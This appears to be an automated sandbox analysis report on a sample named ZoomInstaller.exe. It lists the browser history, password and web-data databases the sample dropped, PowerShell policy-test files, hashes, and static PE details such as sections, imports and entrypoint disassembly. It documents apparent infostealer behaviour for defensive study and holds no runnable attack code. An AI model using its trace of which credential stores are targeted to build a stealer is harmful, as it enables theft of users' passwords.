                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\history.db

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):126976
                                                                                  Entropy (8bit):0.47147045728725767
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                  Malicious:true
                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\passwords.db

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                  Category:dropped
                                                                                  Size (bytes):49152
                                                                                  Entropy (8bit):0.8180424350137764
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\webdata.db

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\ZoomInstaller.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                  Category:dropped
                                                                                  Size (bytes):114688
                                                                                  Entropy (8bit):0.9746603542602881
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):1148
                                                                                  Entropy (8bit):5.330417430258538
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:3Zhl1SKco4KmZjKbmuu1od6em9qr9tYs4RPQoUEJ0gt/NKIl9rgq:rl1SU4xymdajm9qr9tz4RIoUl8NDx
                                                                                  MD5:7D06B6307DEAEAF6764575F610B2FFA4
                                                                                  SHA1:5189934A787737748A8C2BAD53F7D9BB360A2337
                                                                                  SHA-256:5B2985C57741BE839F2D09555A87462066B5A9DFA22984032C2F3F855E6E48F8
                                                                                  SHA-512:E7FF8BEF1ED66DC1DBB4F395D66B479E2F4CDCE1D79A6734885DB9123EADC695500E60CD4E2A8502DBF62AF5BC599AADE23D755BED6752D93880EE8F992F0FFA
                                                                                  Malicious:false
                                                                                  Preview:@...e.................................R..............@..........8...................=.@G..?...o.........System.Security.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.................0..~.J.R...L........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...D.......

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3z4uwxfe.fci.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cig3xdrr.qj1.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mngndqvq.ulc.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nau0334u.ney.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p0gvwhgn.j2r.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p3eiig4y.fce.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_umb4p1ct.5co.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vb4beibc.i21.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                  Entropy (8bit):5.871451489415792
                                                                                  TrID:
                                                                                  • Win64 Executable GUI (202006/5) 92.65%
                                                                                  • Win64 Executable (generic) (12005/4) 5.51%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                  • DOS Executable Generic (2002/1) 0.92%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:ZoomInstaller.exe
                                                                                  File size:22'207'488 bytes
                                                                                  MD5:806a6ccce380785faa45512ce603c580
                                                                                  SHA1:78a2936e19f0474f80f73144564e9f24c4559859
                                                                                  SHA256:c831aebefaf218907d8164288a8249755c47f68b5a6dd223dcef2d150d8df396
                                                                                  SHA512:f228fceffc0af944cff9d06058aa690b1f6bcaea252971ac6b33c58e88429b108c2c4189e807c2659f40035160a4fdeacae961704c81a3e1ba8f1739df2d8e9e
                                                                                  SSDEEP:196608:KKopoPyXk3nLRT155J/YJMIYhOFWBe1ZiieX:zoP+dT155lD/ALiie
                                                                                  TLSH:4A275B46FA9449DACA959435C9AB42C53730FC041F2AABD75A08F33C7DB27D9AE78340
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.........R..@....&....+.`>...R................@..............................X.......^...`... ............................

                                                                                  File Icon

                                                                                  Icon Hash:0301c4e4ae4c2117

                                                                                  Static PE Info

                                                                                  General

                                                                                  Entrypoint:0x1400013c0
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x140000000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LARGE_ADDRESS_AWARE
                                                                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                  TLS Callbacks:0x403e5220, 0x1, 0x403e5200, 0x1
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:6
                                                                                  OS Version Minor:1
                                                                                  File Version Major:6
                                                                                  File Version Minor:1
                                                                                  Subsystem Version Major:6
                                                                                  Subsystem Version Minor:1
                                                                                  Import Hash:a7c025ffa07099999f6fbb8a47ebc600

                                                                                  Entrypoint Preview

                                                                                  Instruction
                                                                                  dec eax
                                                                                  sub esp, 28h
                                                                                  dec eax
                                                                                  mov eax, dword ptr [00738EA5h]
                                                                                  mov dword ptr [eax], 00000001h
                                                                                  call 00007FAE88B2A40Fh
                                                                                  nop
                                                                                  nop
                                                                                  dec eax
                                                                                  add esp, 28h
                                                                                  ret
                                                                                  nop dword ptr [eax]
                                                                                  dec eax
                                                                                  sub esp, 28h
                                                                                  dec eax
                                                                                  mov eax, dword ptr [00738E85h]
                                                                                  mov dword ptr [eax], 00000000h
                                                                                  call 00007FAE88B2A3EFh
                                                                                  nop
                                                                                  nop
                                                                                  dec eax
                                                                                  add esp, 28h
                                                                                  ret
                                                                                  nop dword ptr [eax]
                                                                                  jmp 00007FAE88F0FF58h
                                                                                  nop
                                                                                  nop
                                                                                  nop
                                                                                  nop
                                                                                  nop
                                                                                  nop
                                                                                  nop
                                                                                  nop
                                                                                  nop
                                                                                  nop
                                                                                  nop
                                                                                  dec eax
                                                                                  lea ecx, dword ptr [00000009h]
                                                                                  jmp 00007FAE88B2A649h
                                                                                  nop dword ptr [eax+00h]
                                                                                  ret
                                                                                  nop
                                                                                  nop
                                                                                  nop
                                                                                  nop
                                                                                  nop
                                                                                  nop
                                                                                  nop
                                                                                  nop
                                                                                  nop
                                                                                  nop
                                                                                  nop
                                                                                  nop
                                                                                  nop
                                                                                  nop
                                                                                  nop
                                                                                  nop word ptr [eax+eax+00000000h]
                                                                                  nop word ptr [eax+eax+00h]
                                                                                  jmp dword ptr [eax]
                                                                                  inc edi
                                                                                  outsd
                                                                                  and byte ptr [edx+75h], ah
                                                                                  imul ebp, dword ptr [esp+20h], 203A4449h
                                                                                  and bl, byte ptr [edi+46h]
                                                                                  inc esi
                                                                                  bound esi, dword ptr [edx]
                                                                                  popad
                                                                                  jnc 00007FAE88B2A6CDh
                                                                                  aaa
                                                                                  pop edi
                                                                                  sub eax, 415F4D34h
                                                                                  dec esi
                                                                                  dec esp
                                                                                  jnc 00007FAE88B2A6C7h
                                                                                  pop eax
                                                                                  das
                                                                                  jns 00007FAE88B2A6D6h
                                                                                  jns 00007FAE88B2A6C8h
                                                                                  jnbe 00007FAE88B2A6B0h
                                                                                  pop eax
                                                                                  arpl word ptr [ebx+31h], bp
                                                                                  jc 00007FAE88B2A6C5h
                                                                                  dec edi
                                                                                  popad
                                                                                  xor bl, byte ptr [eax+7Ah]
                                                                                  jc 00007FAE88B2A6CDh
                                                                                  das
                                                                                  sub eax, 5F517145h
                                                                                  imul ebp, dword ptr [ecx+2Dh], 37h
                                                                                  push ebp
                                                                                  dec ecx
                                                                                  pop eax
                                                                                  dec edx

                                                                                  Data Directories

                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x7a90000x159.edata
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x7aa0000x17cc.idata
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x7ae0000x1958.rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x73b0000x16848.pdata
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x7b00000xe360.reloc
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x739ec00x28.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x7aa5600x520.idata
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                  Sections

                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  .text0x10000x3e5fd00x3e60007ea4c339201cfc0d017ff0b87a4b19e3unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                  .data0x3e70000x44b600x44c007f3a4311981f005dbdcd4a469317bf79False0.35641690340909093data4.7016112525326035IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .rdata0x42c0000x30efa00x30f000980004199c90a11f5822ac71af072469unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .pdata0x73b0000x168480x16a00f43182d3de97642869b35118a096df21False0.4437478418508287data5.7958538093412795IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .xdata0x7520000x6e380x7000b67dc254f2818584b007d9f5e7f6c7d0False0.15841238839285715data4.555509799133882IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .bss0x7590000x4fb900x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .edata0x7a90000x1590x20030fe0610bc0a77d191a7ad97749dc072False0.41796875data3.6898871269927276IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .idata0x7aa0000x17cc0x180080786bfdb64d5983762cc60cec534c6dFalse0.31103515625data4.581143990765701IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .CRT0x7ac0000x600x200c169c31a7238605c1737945e51f7b6a8False0.064453125data0.3029571603346658IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .tls0x7ad0000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .rsrc0x7ae0000x19580x1a00620ce9f25f196dce93d103918034bcf6False0.42232572115384615data5.972815278958329IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .reloc0x7b00000xe3600xe40030c8e1f349b7c140a991746bf7696280False0.2539405153508772data5.433384464940853IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                  /40x7bf0000xa000xa00f572ff26ebb6d763b114fcdf85f1b0b7False0.23125data2.172227556052624IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                  /190x7c00000x4e8a6c0x4e8c0018482ad49d6930aadea4051e7032cd1aunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                  /310xca90000x5bb30x5c0099cb2691f7a424dcc90dd9f3c5e9a3b4False0.25747282608695654data4.951740082737746IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                  /450xcaf0000x2031340x203200d210e398493c72b90f26bbad6d9b7cf9unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                  /570xeb30000x789080x78a0066ed03329fa137a3544f15b3ac177939False0.24312459520725388data4.819335116736298IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                  /700xf2c0000x2d6e0x2e0002ddab6e6787fb523255ef99c09c7514False0.467476222826087data4.902638410052134IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                  /810xf2f0000x38fcdf0x38fe00ebc4ad0edd74625957cdfbc2787f88b4unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                  /920x12bf0000x1120600x112200991c4336c4aaf2c5a9b2538f095ccebbFalse0.1585593721500228data2.3723520688244295IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                  /1060x13d20000x300x20040cca7c46fc713b4f088e5d440ca7931False0.103515625data0.8556848540171443IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                  /1250x13d30000x30300x3200cdf146190012415e7b1a41f86838392cFalse0.127890625data5.00188009895494IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                  /1410x13d70000x17ead20x17ec00fb09a426318d9493dd36d65f9dbaf405False0.42729807927824953data5.452375099590376IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                  /1570x15560000x326150x328004f9c42a72c5c1f8cedaa8b20d619e1ddFalse0.5112401376856436data5.516542450471743IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                  Resources

                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                  RT_ICON0x7ae1300x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 15000 x 15000 px/mEnglishUnited States0.4195590994371482
                                                                                  RT_GROUP_ICON0x7af1d80x14dataEnglishUnited States1.1
                                                                                  RT_VERSION0x7af1ec0x2dcdataEnglishUnited States0.4931693989071038
                                                                                  RT_MANIFEST0x7af4c80x48fXML 1.0 document, ASCII text0.40102827763496146

                                                                                  Imports

                                                                                  DLLImport
                                                                                  KERNEL32.dllAddVectoredContinueHandler, AddVectoredExceptionHandler, AreFileApisANSI, CloseHandle, CreateEventA, CreateFileA, CreateFileMappingA, CreateFileMappingW, CreateFileW, CreateIoCompletionPort, CreateMutexW, CreateThread, CreateWaitableTimerA, CreateWaitableTimerExW, DeleteCriticalSection, DeleteFileA, DeleteFileW, DuplicateHandle, EnterCriticalSection, ExitProcess, FlushFileBuffers, FlushViewOfFile, FormatMessageA, FormatMessageW, FreeEnvironmentStringsW, FreeLibrary, GetConsoleMode, GetCurrentProcessId, GetCurrentThreadId, GetDiskFreeSpaceA, GetDiskFreeSpaceW, GetEnvironmentStringsW, GetErrorMode, GetFileAttributesA, GetFileAttributesExW, GetFileAttributesW, GetFileSize, GetFullPathNameA, GetFullPathNameW, GetLastError, GetProcAddress, GetProcessAffinityMask, GetProcessHeap, GetQueuedCompletionStatusEx, GetStdHandle, GetSystemDirectoryA, GetSystemInfo, GetSystemTime, GetSystemTimeAsFileTime, GetTempPathA, GetTempPathW, GetThreadContext, GetTickCount, GetVersionExA, GetVersionExW, HeapAlloc, HeapCompact, HeapCreate, HeapDestroy, HeapFree, HeapReAlloc, HeapSize, HeapValidate, InitializeCriticalSection, IsDBCSLeadByteEx, LeaveCriticalSection, LoadLibraryA, LoadLibraryExW, LoadLibraryW, LocalFree, LockFile, LockFileEx, MapViewOfFile, MultiByteToWideChar, OutputDebugStringA, OutputDebugStringW, PostQueuedCompletionStatus, QueryPerformanceCounter, RaiseFailFastException, ReadFile, ResumeThread, RtlLookupFunctionEntry, RtlVirtualUnwind, SetConsoleCtrlHandler, SetEndOfFile, SetErrorMode, SetEvent, SetFilePointer, SetProcessPriorityBoost, SetThreadContext, SetUnhandledExceptionFilter, SetWaitableTimer, Sleep, SuspendThread, SwitchToThread, SystemTimeToFileTime, TlsAlloc, TlsGetValue, TryEnterCriticalSection, UnlockFile, UnlockFileEx, UnmapViewOfFile, VirtualAlloc, VirtualFree, VirtualProtect, VirtualQuery, WaitForMultipleObjects, WaitForSingleObject, WaitForSingleObjectEx, WerGetFlags, WerSetFlags, WideCharToMultiByte, WriteConsoleW, WriteFile, __C_specific_handler
                                                                                  msvcrt.dll___lc_codepage_func, ___mb_cur_max_func, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _beginthread, _beginthreadex, _cexit, _commode, _endthreadex, _errno, _fmode, _initterm, _localtime64, _lock, _unlock, abort, atexit, calloc, exit, fprintf, fputc, free, fwrite, localeconv, malloc, memchr, memcmp, memcpy, memmove, memset, qsort, realloc, signal, strchr, strcmp, strcspn, strerror, strlen, strncmp, strrchr, strspn, vfprintf, wcslen

                                                                                  Exports

                                                                                  NameOrdinalAddress
                                                                                  _cgo_dummy_export10x1407a7fd0
